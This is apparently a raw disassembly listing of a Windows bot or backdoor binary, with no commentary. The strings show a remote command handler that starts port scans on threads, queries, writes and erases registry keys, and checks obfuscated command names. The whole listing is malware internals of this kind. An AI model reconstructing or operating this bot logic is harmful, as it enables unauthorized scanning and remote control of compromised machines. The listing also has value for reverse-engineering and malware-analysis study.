loc_408098: ; CODE XREF: sub_403B2C+4563�j
cmp [ebp+arg_58], ebx
jz short loc_4080A1
and byte ptr [ebp+var_38+3], 0
loc_4080A1: ; CODE XREF: sub_403B2C+455E�j
; sub_403B2C+456A�j ...
push esi
push [ebp+var_38]
call dword_45439C ; inet_ntoa
push eax
lea eax, [ebp+var_238]
push eax
call sub_4222F0
add esp, 0Ch
cmp [ebp+arg_5C], ebx
jz loc_40800E
xor esi, esi
cmp [ebp+arg_50], ebx
jz short loc_4080D0
push 3
loc_4080CD: ; CODE XREF: sub_403B2C+45AB�j
pop esi
jmp short loc_4080E1
; ---------------------------------------------------------------------------
loc_4080D0: ; CODE XREF: sub_403B2C+459D�j
cmp [ebp+arg_54], ebx
jz short loc_4080D9
push 2
jmp short loc_4080CD
; ---------------------------------------------------------------------------
loc_4080D9: ; CODE XREF: sub_403B2C+45A7�j
cmp [ebp+arg_58], ebx
jz short loc_4080E1
xor esi, esi
inc esi
loc_4080E1: ; CODE XREF: sub_403B2C+45A2�j
; sub_403B2C+45B0�j
lea eax, [ebp+var_238]
push 30h
push eax
call sub_4234F0
pop ecx
xor bl, bl
test esi, esi
pop ecx
jle loc_407EFB
loc_4080FB: ; CODE XREF: sub_403B2C+45F1�j
test eax, eax
jz loc_407EFB
mov byte ptr [eax], 78h
lea eax, [ebp+var_238]
push 30h
push eax
call sub_4234F0
pop ecx
inc bl
pop ecx
movsx ecx, bl
cmp ecx, esi
jl short loc_4080FB
jmp loc_407EFB
; ---------------------------------------------------------------------------
loc_408124: ; CODE XREF: sub_403B2C+4514�j
push offset dword_439644
loc_408129: ; CODE XREF: sub_403B2C+451F�j
push eax
call dword_42F04C ; lstrcpyA
cmp [ebp+var_17C], 0
mov eax, offset aRandom ; "Random"
jnz short loc_408143
mov eax, offset aSequential ; "Sequential"
loc_408143: ; CODE XREF: sub_403B2C+4610�j
push [ebp+var_190]
lea ecx, [ebp+var_238]
mov ebx, offset aRaMr15qabm1 ; "RA/Mr15qAbm1"
mov esi, offset aSSPortscanStar ; "%s %s PortScan started on %s:%d with a "...
push [ebp+var_1A0]
push [ebp+var_1A4]
push [ebp+var_1A8]
push ecx
push eax
push ebx
push esi
push 8
call sub_41BED7
add esp, 24h
mov [ebp+var_19C], eax
lea eax, [ebp+arg_6C]
lea ecx, [ebp+var_238]
push eax
xor eax, eax
push eax
push ecx
push offset sub_40178D
push eax
push eax
call dword_42F158 ; CreateThread
mov ecx, [ebp+var_19C]
imul ecx, 1018h
test eax, eax
mov dword_46D414[ecx], eax
jnz short loc_4081F7
cmp [ebp+arg_14], eax
mov esi, dword_42F068
jnz short loc_4081D7
cmp [ebp+arg_18], eax
jnz short loc_4081E1
call esi ; dword_42F068
push eax
push ebx
push offset aSFailedToSta_0 ; "%s Failed to start scan thread, error: "...
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 14h
loc_4081D7: ; CODE XREF: sub_403B2C+468D�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4081E1: ; CODE XREF: sub_403B2C+4692�j
call esi ; dword_42F068
push eax
push ebx
push offset aSFailedToSta_0 ; "%s Failed to start scan thread, error: "...
jmp loc_40A5C3
; ---------------------------------------------------------------------------
loc_4081EF: ; CODE XREF: sub_403B2C+46D2�j
push 32h
call dword_42F15C ; Sleep
loc_4081F7: ; CODE XREF: sub_403B2C+4682�j
cmp [ebp+var_178], 0
jz short loc_4081EF
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_408257
cmp [ebp+arg_18], eax
jnz short loc_408261
cmp [ebp+arg_1C], eax
jnz loc_40AF54
cmp [ebp+var_17C], eax
mov eax, offset aRandom ; "Random"
jnz short loc_408227
mov eax, offset aSequential ; "Sequential"
loc_408227: ; CODE XREF: sub_403B2C+46F4�j
push [ebp+var_190]
lea ecx, [ebp+var_238]
push [ebp+var_1A0]
push [ebp+var_1A4]
push [ebp+var_1A8]
push ecx
push eax
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 28h
loc_408257: ; CODE XREF: sub_403B2C+46D9�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_408261: ; CODE XREF: sub_403B2C+46DE�j
cmp [ebp+var_17C], 0
mov eax, offset aRandom ; "Random"
jnz short loc_408274
mov eax, offset aSequential ; "Sequential"
loc_408274: ; CODE XREF: sub_403B2C+4741�j
push [ebp+var_190]
lea ecx, [ebp+var_238]
push [ebp+var_1A0]
push [ebp+var_1A4]
push [ebp+var_1A8]
push ecx
push eax
push ebx
push esi
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 28h
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4082A8: ; CODE XREF: sub_403B2C+4255�j
push dword ptr [esi]
push offset a7tmte_meccn ; "7Tmte.MEccn/"
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aWn7_tNza2v ; "wN7.t/nZA2V/"
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aGkyv90skypy ; "gkYv90Skypy/"
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aX2yn5_2imz1 ; "X2yN5/.2ImZ1"
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aNPbw1sdkiw_ ; "N/pbW1sDKiw."
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aFdxpb0leh21_ ; "fDxPB0lEh21."
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aVb1r0N_arr0 ; "vB1r0/N.Arr0"
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aUts3o_rfmks_ ; "uts3o.RfmkS."
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aBpyvp_fw0vy1 ; "bPYVP.Fw0vY1"
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aQxqog1goyq80 ; "QXqOg1gOYq80"
call ebx ; dword_42F070
test eax, eax
jz loc_40A5F7
push dword ptr [esi]
push offset aZjiqo07c20 ; "ZjIqO/07c2/0"
call ebx ; dword_42F070
test eax, eax
jnz loc_408AF5
mov eax, [esi+4]
xor ecx, ecx
cmp eax, ecx
jz loc_408AC3
cmp [esi+8], ecx
jz loc_408AC3
cmp [esi+0Ch], ecx
jz loc_408AC3
push eax
push offset aEavyh_ic0dc0_0 ; "eAvYh.IC0dc0"
call ebx ; dword_42F070
test eax, eax
jnz loc_40852E
push dword ptr [esi+8]
call sub_41A292
push dword ptr [esi+10h]
mov [ebp+arg_0], eax
mov eax, [esi+0Ch]
mov [ebp+arg_8], eax
lea eax, [ebp+var_1314]
push offset aS_1 ; "%s"
push eax
call sub_422063
add esp, 10h
push 5
pop ebx
cmp [ebp+arg_4], ebx
jle short loc_4083FC
loc_4083C2: ; CODE XREF: sub_403B2C+48CE�j
mov eax, [esi+ebx*4]
test eax, eax
jz short loc_4083F6
push eax
lea eax, [ebp+var_1BCAC]
push offset aS_0 ; " %s"
push eax
call sub_422063
lea eax, [ebp+var_1BCAC]
push 104h
push eax
lea eax, [ebp+var_1314]
push eax
call sub_421F40
add esp, 18h
loc_4083F6: ; CODE XREF: sub_403B2C+489B�j
inc ebx
cmp ebx, [ebp+arg_4]
jl short loc_4083C2
loc_4083FC: ; CODE XREF: sub_403B2C+4894�j
mov al, [ebp+arg_34]
mov byte ptr [ebp+arg_C+3], 5Fh
test al, al
jz short loc_40840A
mov byte ptr [ebp+arg_C+3], al
loc_40840A: ; CODE XREF: sub_403B2C+48D9�j
cmp [ebp+arg_30], 0
jz short loc_408472
push [ebp+arg_8]
xor ebx, ebx
call sub_422120
test eax, eax
pop ecx
jbe short loc_40843C
loc_40841F: ; CODE XREF: sub_403B2C+490E�j
mov eax, [ebp+arg_8]
mov cl, byte ptr [ebp+arg_C+3]
add eax, ebx
cmp [eax], cl
jnz short loc_40842E
mov byte ptr [eax], 20h
loc_40842E: ; CODE XREF: sub_403B2C+48FD�j
push [ebp+arg_8]
inc ebx
call sub_422120
cmp ebx, eax
pop ecx
jb short loc_40841F
loc_40843C: ; CODE XREF: sub_403B2C+48F1�j
lea eax, [ebp+var_1314]
xor ebx, ebx
push eax
call sub_422120
test eax, eax
pop ecx
jbe short loc_408472
loc_40844F: ; CODE XREF: sub_403B2C+4944�j
mov cl, byte ptr [ebp+arg_C+3]
lea eax, [ebp+ebx+var_1314]
cmp [eax], cl
jnz short loc_408460
mov byte ptr [eax], 20h
loc_408460: ; CODE XREF: sub_403B2C+492F�j
lea eax, [ebp+var_1314]
inc ebx
push eax
call sub_422120
cmp ebx, eax
pop ecx
jb short loc_40844F
loc_408472: ; CODE XREF: sub_403B2C+48E2�j
; sub_403B2C+4921�j
lea eax, [ebp+var_1314]
push eax
push [ebp+arg_8]
push [ebp+arg_0]
call sub_41A454
add esp, 0Ch
mov ebx, offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
test eax, eax
jz short loc_4084DF
cmp [ebp+arg_14], 0
jnz short loc_4084BD
cmp [ebp+arg_18], 0
jnz short loc_4084C7
lea eax, [ebp+var_1314]
push eax
push [ebp+arg_8]
push dword ptr [esi+8]
push ebx
push offset aSErasedKeySSS ; "%s Erased Key: %s\\%s\\%s"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_4084BD: ; CODE XREF: sub_403B2C+4968�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4084C7: ; CODE XREF: sub_403B2C+496E�j
lea eax, [ebp+var_1314]
push eax
push [ebp+arg_8]
push dword ptr [esi+8]
push ebx
push offset aSErasedKeySSS ; "%s Erased Key: %s\\%s\\%s"
jmp loc_404F2E
; ---------------------------------------------------------------------------
loc_4084DF: ; CODE XREF: sub_403B2C+4962�j
cmp [ebp+arg_14], 0
jnz short loc_40850C
cmp [ebp+arg_18], 0
jnz short loc_408516
lea eax, [ebp+var_1314]
push eax
push [ebp+arg_8]
push dword ptr [esi+8]
push ebx
push offset aSFailedToErase ; "%s Failed to erase key: %s\\%s\\%s"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_40850C: ; CODE XREF: sub_403B2C+49B7�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_408516: ; CODE XREF: sub_403B2C+49BD�j
lea eax, [ebp+var_1314]
push eax
push [ebp+arg_8]
push dword ptr [esi+8]
push ebx
push offset aSFailedToErase ; "%s Failed to erase key: %s\\%s\\%s"
jmp loc_404F2E
; ---------------------------------------------------------------------------
loc_40852E: ; CODE XREF: sub_403B2C+4860�j
push dword ptr [esi+4]
push offset aA4pllAqpbg_ ; "a4pll/aQpBg."
call ebx ; dword_42F070
test eax, eax
jnz loc_40882B
cmp [esi+10h], eax
push dword ptr [esi+8]
jnz short loc_408598
call sub_41A292
mov ebx, [ebp+arg_10]
mov ecx, [esi+0Ch]
push ebx
push dword ptr [edi+0Ch]
push ecx
push eax
call sub_41A60E
add esp, 14h
push dword ptr [esi+0Ch]
test eax, eax
push dword ptr [esi+8]
push offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
jz short loc_408577
push offset aSDoneWithQuery ; "%s Done with query: %s\\%s"
jmp short loc_40857C
; ---------------------------------------------------------------------------
loc_408577: ; CODE XREF: sub_403B2C+4A42�j
push offset aSFailedToQuery ; "%s Failed to query: %s\\%s"
loc_40857C: ; CODE XREF: sub_403B2C+4A49�j
cmp [ebp+arg_18], 0
jnz short loc_408590
push dword ptr [edi+0Ch]
push ebx
call sub_4104F6
jmp loc_40AF51
; ---------------------------------------------------------------------------
loc_408590: ; CODE XREF: sub_403B2C+4A54�j
push dword ptr [edi]
push ebx
jmp loc_40AF4C
; ---------------------------------------------------------------------------
loc_408598: ; CODE XREF: sub_403B2C+4A1A�j
call sub_41A370
push dword ptr [esi+0Ch]
mov [ebp+arg_8], eax
call sub_41A292
mov ebx, [esi+10h]
mov [ebp+var_4], eax
mov al, [ebp+arg_34]
pop ecx
test al, al
pop ecx
mov [ebp+arg_0], ebx
mov byte ptr [ebp+arg_C+3], 5Fh
jz short loc_4085C1
mov byte ptr [ebp+arg_C+3], al
loc_4085C1: ; CODE XREF: sub_403B2C+4A90�j
cmp [ebp+arg_30], 0
jz short loc_4085F4
and [ebp+arg_4], 0
push ebx
call sub_422120
test eax, eax
pop ecx
jbe short loc_4085F4
loc_4085D6: ; CODE XREF: sub_403B2C+4AC6�j
mov eax, [ebp+arg_4]
mov cl, byte ptr [ebp+arg_C+3]
add eax, ebx
cmp [eax], cl
jnz short loc_4085E5
mov byte ptr [eax], 20h
loc_4085E5: ; CODE XREF: sub_403B2C+4AB4�j
inc [ebp+arg_4]
push ebx
call sub_422120
cmp [ebp+arg_4], eax
pop ecx
jb short loc_4085D6
loc_4085F4: ; CODE XREF: sub_403B2C+4A99�j
; sub_403B2C+4AA8�j
mov ebx, [esi+14h]
test ebx, ebx
jz loc_40AF54
cmp [ebp+arg_30], 0
jz short loc_408632
and [ebp+arg_4], 0
push ebx
call sub_422120
test eax, eax
pop ecx
jbe short loc_408632
loc_408614: ; CODE XREF: sub_403B2C+4B04�j
mov eax, [ebp+arg_4]
mov cl, byte ptr [ebp+arg_C+3]
add eax, ebx
cmp [eax], cl
jnz short loc_408623
mov byte ptr [eax], 20h
loc_408623: ; CODE XREF: sub_403B2C+4AF2�j
inc [ebp+arg_4]
push ebx
call sub_422120
cmp [ebp+arg_4], eax
pop ecx
jb short loc_408614
loc_408632: ; CODE XREF: sub_403B2C+4AD7�j
; sub_403B2C+4AE6�j
mov eax, [ebp+arg_8]
cmp eax, 1
jz short loc_4086B2
cmp eax, 7
jz short loc_4086B2
cmp eax, 2
jz short loc_4086B2
cmp eax, 4
jnz loc_40AF54
lea eax, [ebp+var_24]
and [ebp+var_24], 0
push eax
push ebx
push [ebp+arg_0]
push [ebp+var_4]
call sub_41A7B3
add esp, 10h
cmp [ebp+var_24], 0
jz short loc_408690
push eax
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
push offset aSQuerySSSD ; "%s Query: %s\\%s\\%s: %d"
loc_40867E: ; CODE XREF: sub_403B2C+4CCA�j
cmp [ebp+arg_18], 0
jnz loc_408A5B
push dword ptr [edi+0Ch]
jmp loc_403F6A
; ---------------------------------------------------------------------------
loc_408690: ; CODE XREF: sub_403B2C+4B3C�j
push dword ptr [esi+14h]
cmp [ebp+arg_18], 0
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
push offset aSFailedToQue_0 ; "%s Failed to query: %s\\%s\\%s"
jnz loc_408818
jmp loc_404F2E
; ---------------------------------------------------------------------------
loc_4086B2: ; CODE XREF: sub_403B2C+4B0C�j
; sub_403B2C+4B11�j ...
push [ebp+arg_8]
push ebx
push [ebp+arg_0]
push [ebp+var_4]
call sub_41A829
add esp, 10h
mov [ebp+arg_C], eax
test eax, eax
jz loc_4087FB
cmp [ebp+arg_8], 7
jnz loc_4087E2
cmp [ebp+arg_14], 0
mov ebx, offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
jnz short loc_408707
cmp [ebp+arg_18], 0
jnz short loc_40870D
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push ebx
push offset aSDisplayingSSS ; "%s Displaying: %s\\%s\\%s"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_408707: ; CODE XREF: sub_403B2C+4BB6�j
cmp [ebp+arg_18], 0
jz short loc_408729
loc_40870D: ; CODE XREF: sub_403B2C+4BBC�j
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push ebx
push offset aSDisplayingSSS ; "%s Displaying: %s\\%s\\%s"
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 1Ch
loc_408729: ; CODE XREF: sub_403B2C+4BDF�j
push offset asc_433F80 ; "\n"
push [ebp+arg_C]
jmp short loc_408766
; ---------------------------------------------------------------------------
loc_408733: ; CODE XREF: sub_403B2C+4C4E�j
mov eax, [ebp+arg_4]
and byte ptr [eax], 0
cmp [ebp+arg_18], 0
jnz short loc_40874C
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
jmp short loc_408756
; ---------------------------------------------------------------------------
loc_40874C: ; CODE XREF: sub_403B2C+4C11�j
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
loc_408756: ; CODE XREF: sub_403B2C+4C1E�j
mov eax, [ebp+arg_4]
add esp, 10h
inc eax
push offset asc_433F80 ; "\n"
mov [ebp+arg_C], eax
push eax
loc_408766: ; CODE XREF: sub_403B2C+4C05�j
call sub_4235C0
pop ecx
mov [ebp+arg_4], eax
pop ecx
push [ebp+arg_C]
test eax, eax
push offset aS_1 ; "%s"
jnz short loc_408733
cmp [ebp+arg_18], eax
jnz short loc_40878E
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
jmp short loc_408798
; ---------------------------------------------------------------------------
loc_40878E: ; CODE XREF: sub_403B2C+4C53�j
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
loc_408798: ; CODE XREF: sub_403B2C+4C60�j
add esp, 10h
cmp [ebp+arg_14], 0
jnz short loc_4087C4
cmp [ebp+arg_18], 0
jnz short loc_4087CE
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push ebx
push offset aSFinishedDispl ; "%s Finished displaying: %s\\%s\\%s"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 1Ch
loc_4087C4: ; CODE XREF: sub_403B2C+4C73�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4087CE: ; CODE XREF: sub_403B2C+4C79�j
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push ebx
push offset aSFinishedDispl ; "%s Finished displaying: %s\\%s\\%s"
jmp loc_404F2E
; ---------------------------------------------------------------------------
loc_4087E2: ; CODE XREF: sub_403B2C+4BA7�j
push eax
push dword ptr [esi+14h]
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
push offset aSQuerySSSS ; "%s Query: %s\\%s\\%s: %s"
jmp loc_40867E
; ---------------------------------------------------------------------------
loc_4087FB: ; CODE XREF: sub_403B2C+4B9D�j
push dword ptr [esi+14h]
cmp [ebp+arg_18], 0
push dword ptr [esi+10h]
push dword ptr [esi+0Ch]
push offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
push offset aSFailedToQue_0 ; "%s Failed to query: %s\\%s\\%s"
jnz loc_404F2E
loc_408818: ; CODE XREF: sub_403B2C+13D9�j
; sub_403B2C+4B7B�j
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
loc_408823: ; CODE XREF: sub_403B2C+140C�j
add esp, 1Ch
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_40882B: ; CODE XREF: sub_403B2C+4A0E�j
push dword ptr [esi+4]
push offset aNn0i61ujg7h1 ; "NN0i61uJg7H1"
call ebx ; dword_42F070
test eax, eax
jnz loc_40AF54
cmp [esi+10h], eax
jz loc_408AB4
cmp [esi+14h], eax
jz loc_408AB4
cmp [esi+18h], eax
jz loc_408AB4
push dword ptr [esi+8]
call sub_41A370
push dword ptr [esi+0Ch]
mov [ebp+var_4], eax
call sub_41A292
mov ebx, [esi+10h]
mov [ebp+var_8], eax
mov eax, [esi+14h]
pop ecx
mov [ebp+arg_4], eax
mov al, [ebp+arg_34]
test al, al
pop ecx
mov [ebp+arg_0], ebx
mov byte ptr [ebp+arg_C+3], 5Fh
jz short loc_40888A
mov byte ptr [ebp+arg_C+3], al
loc_40888A: ; CODE XREF: sub_403B2C+4D59�j
cmp [ebp+arg_30], 0
jz short loc_4088F1
and [ebp+arg_8], 0
push ebx
call sub_422120
test eax, eax
pop ecx
jbe short loc_4088BD
loc_40889F: ; CODE XREF: sub_403B2C+4D8F�j
mov eax, [ebp+arg_8]
mov cl, byte ptr [ebp+arg_C+3]
add eax, ebx
cmp [eax], cl
jnz short loc_4088AE
mov byte ptr [eax], 20h
loc_4088AE: ; CODE XREF: sub_403B2C+4D7D�j
inc [ebp+arg_8]
push ebx
call sub_422120
cmp [ebp+arg_8], eax
pop ecx
jb short loc_40889F
loc_4088BD: ; CODE XREF: sub_403B2C+4D71�j
push [ebp+arg_4]
and [ebp+arg_8], 0
call sub_422120
test eax, eax
pop ecx
jbe short loc_4088F1
loc_4088CE: ; CODE XREF: sub_403B2C+4DC3�j
mov eax, [ebp+arg_8]
mov ecx, [ebp+arg_4]
add eax, ecx
mov cl, byte ptr [ebp+arg_C+3]
cmp [eax], cl
jnz short loc_4088E0
mov byte ptr [eax], 20h
loc_4088E0: ; CODE XREF: sub_403B2C+4DAF�j
push [ebp+arg_4]
inc [ebp+arg_8]
call sub_422120
cmp [ebp+arg_8], eax
pop ecx
jb short loc_4088CE
loc_4088F1: ; CODE XREF: sub_403B2C+4D62�j
; sub_403B2C+4DA0�j
mov eax, [ebp+var_4]
cmp eax, 1
jz loc_4089F5
cmp eax, 7
jz loc_4089F5
cmp eax, 2
jz loc_4089F5
cmp eax, 4
jnz loc_40AF54
push dword ptr [esi+18h]
call sub_422B5A
push eax
push [ebp+arg_4]
push ebx
push [ebp+var_8]
call sub_41A8D1
add esp, 14h
mov ebx, offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
test eax, eax
jz short loc_40898F
cmp [ebp+arg_14], 0
jnz short loc_40896B
cmp [ebp+arg_18], 0
jnz short loc_408975
push dword ptr [esi+18h]
call sub_422B5A
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [esi+0Ch]
push ebx
push offset aSSuccessfullyW ; "%s Successfully wrote: %s\\%s\\%s (%d)"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 24h
loc_40896B: ; CODE XREF: sub_403B2C+4E11�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_408975: ; CODE XREF: sub_403B2C+4E17�j
push dword ptr [esi+18h]
call sub_422B5A
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [esi+0Ch]
push ebx
push offset aSSuccessfullyW ; "%s Successfully wrote: %s\\%s\\%s (%d)"
jmp short loc_4089E3
; ---------------------------------------------------------------------------
loc_40898F: ; CODE XREF: sub_403B2C+4E0B�j
cmp [ebp+arg_14], 0
jnz short loc_4089C1
cmp [ebp+arg_18], 0
jnz short loc_4089CB
push dword ptr [esi+18h]
call sub_422B5A
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [esi+0Ch]
push ebx
push offset aSFailedToWrite ; "%s Failed to write: %s\\%s\\%s (%d)"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 24h
loc_4089C1: ; CODE XREF: sub_403B2C+4E67�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_4089CB: ; CODE XREF: sub_403B2C+4E6D�j
push dword ptr [esi+18h]
call sub_422B5A
push eax
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [esi+0Ch]
push ebx
push offset aSFailedToWrite ; "%s Failed to write: %s\\%s\\%s (%d)"
loc_4089E3: ; CODE XREF: sub_403B2C+4E61�j
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
add esp, 24h
jmp loc_40AF54
; ---------------------------------------------------------------------------
loc_4089F5: ; CODE XREF: sub_403B2C+4DCB�j
; sub_403B2C+4DD4�j ...
push [ebp+var_4]
push dword ptr [esi+18h]
push [ebp+arg_4]
push ebx
push [ebp+var_8]
call sub_41A8F2
add esp, 14h
mov ebx, offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
test eax, eax
jz short loc_408A6A
cmp [ebp+arg_14], 0
jnz short loc_408A3F
cmp [ebp+arg_18], 0
jnz short loc_408A49
push dword ptr [esi+18h]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [esi+0Ch]
push ebx
push offset aSWroteKeySSSS ; "%s Wrote key: %s\\%s\\%s (%s)"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 20h
loc_408A3F: ; CODE XREF: sub_403B2C+4EEB�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_408A49: ; CODE XREF: sub_403B2C+4EF1�j
push dword ptr [esi+18h]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [esi+0Ch]
push ebx
push offset aSWroteKeySSSS ; "%s Wrote key: %s\\%s\\%s (%s)"
loc_408A5B: ; CODE XREF: sub_403B2C+4B56�j
; sub_403B2C+4F86�j
push dword ptr [edi]
push [ebp+arg_10]
call sub_410491
jmp loc_40A16B
; ---------------------------------------------------------------------------
loc_408A6A: ; CODE XREF: sub_403B2C+4EE5�j
cmp [ebp+arg_14], 0
jnz short loc_408A96
cmp [ebp+arg_18], 0
jnz short loc_408AA0
push dword ptr [esi+18h]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [esi+0Ch]
push ebx
push offset aSFailedToWri_0 ; "%s Failed to write: %s\\%s\\%s (%s)"
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 20h
loc_408A96: ; CODE XREF: sub_403B2C+4F42�j
cmp [ebp+arg_18], 0
jz loc_40AF54
loc_408AA0: ; CODE XREF: sub_403B2C+4F48�j
push dword ptr [esi+18h]
push [ebp+arg_4]
push [ebp+arg_0]
push dword ptr [esi+0Ch]
push ebx
push offset aSFailedToWri_0 ; "%s Failed to write: %s\\%s\\%s (%s)"
jmp short loc_408A5B
; ---------------------------------------------------------------------------
loc_408AB4: ; CODE XREF: sub_403B2C+FA0�j
; sub_403B2C+FA9�j ...
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
jmp loc_407722
; ---------------------------------------------------------------------------
loc_408AC3: ; CODE XREF: sub_403B2C+483E�j
; sub_403B2C+4847�j ...
cmp [ebp+arg_14], ecx
mov esi, offset aSMissingParamS ; "%s Missing param(s)"
mov ebx, offset aTovrfYuzfi1mns ; "tOVrF/YuzFI1Mnsrm1FhS.k."
jnz short loc_408AED
cmp [ebp+arg_18], ecx
jnz loc_40AD9F
push ebx
push esi
push dword ptr [edi+0Ch]
push [ebp+arg_10]
call sub_4104F6
add esp, 10h
xor ecx, ecx
loc_408AED: ; CODE XREF: sub_403B2C+4FA4�j
cmp [ebp+arg_18], ecx
jmp loc_40AD99
; ---------------------------------------------------------------------------
loc_408AF5: ; CODE XREF: sub_403B2C+4831�j
push dword ptr [esi]
push offset aIkgekKykjq1 ; "iKgEK/kyKJQ1"
call ebx ; dword_42F070
test eax, eax
jz loc_40A40D
push dword ptr [esi]
push offset a6x7zf1eztny_ ; "6x7zf1EztnY."
call ebx ; dword_42F070
test eax, eax
jz loc_40A40D
push dword ptr [esi]
push offset a7otcu0fic6v0 ; "7otcU0FiC6V0"
call ebx ; dword_42F070
test eax, eax
jz loc_40A40D
push dword ptr [esi]
push offset aMb05gVyf8f1 ; "mb05g/VYf8f1"
call ebx ; dword_42F070
test eax, eax
jz loc_40A40D
push dword ptr [esi]
push offset aFyflu0ji3xh_ ; "FyFlU0jI3XH."
call ebx ; dword_42F070
test eax, eax
jz loc_40A40D
push dword ptr [esi]
push offset aSbsip_o7v4b ; "SbsIp.o7V4B/"
call ebx ; dword_42F070
test eax, eax
jnz short loc_408B63
push offset aTcp ; "Tcp"
push 11h
jmp loc_409B7C
; ---------------------------------------------------------------------------
loc_408B63: ; CODE XREF: sub_403B2C+5029�j
push dword ptr [esi]
push offset aUyfog_dvvny0 ; "UyfOG.DvVnY0"
call ebx ; dword_42F070
test eax, eax
jnz loc_408D3C
xor ebx, ebx
cmp [esi+4], ebx
jz loc_4092AB
cmp [esi+8], ebx
jz loc_4092AB
cmp [esi+0Ch], ebx
jz loc_4092AB
cmp [esi+10h], ebx
jz loc_4092AB
push 12h
call sub_41C254
cmp eax, 0Ah
pop ecx
mov [ebp+arg_C], eax
jg loc_4090D5
mov eax, [ebp+arg_14]
mov [ebp+var_CE4], eax
mov eax, [ebp+arg_18]
mov [ebp+var_CE8], eax
cmp eax, ebx
lea eax, [ebp+var_E00]
jnz short loc_408BCF
push dword ptr [edi+0Ch]
jmp short loc_408BD1
; ---------------------------------------------------------------------------
loc_408BCF: ; CODE XREF: sub_403B2C+509C�j
push dword ptr [edi]
loc_408BD1: ; CODE XREF: sub_403B2C+50A1�j
push eax
call dword_42F04C ; lstrcpyA
mov eax, [ebp+arg_10]
push 7Fh
mov [ebp+var_E08], eax
push dword ptr [esi+4]
lea eax, [ebp+var_D80]
push eax
call sub_4222F0
push dword ptr [esi+8]
call sub_422B5A
mov [ebp+var_CF4], eax
push dword ptr [esi+0Ch]
call sub_422B5A
mov [ebp+var_CF0], eax
push dword ptr [esi+10h]
call sub_422B5A
add esp, 18h
cmp [ebp+arg_14], 0
mov [ebp+var_CF8], eax
mov ebx, offset aI7lwu1uby8a0 ; "i7LwU1UbY8A0"
jnz short loc_408C5B
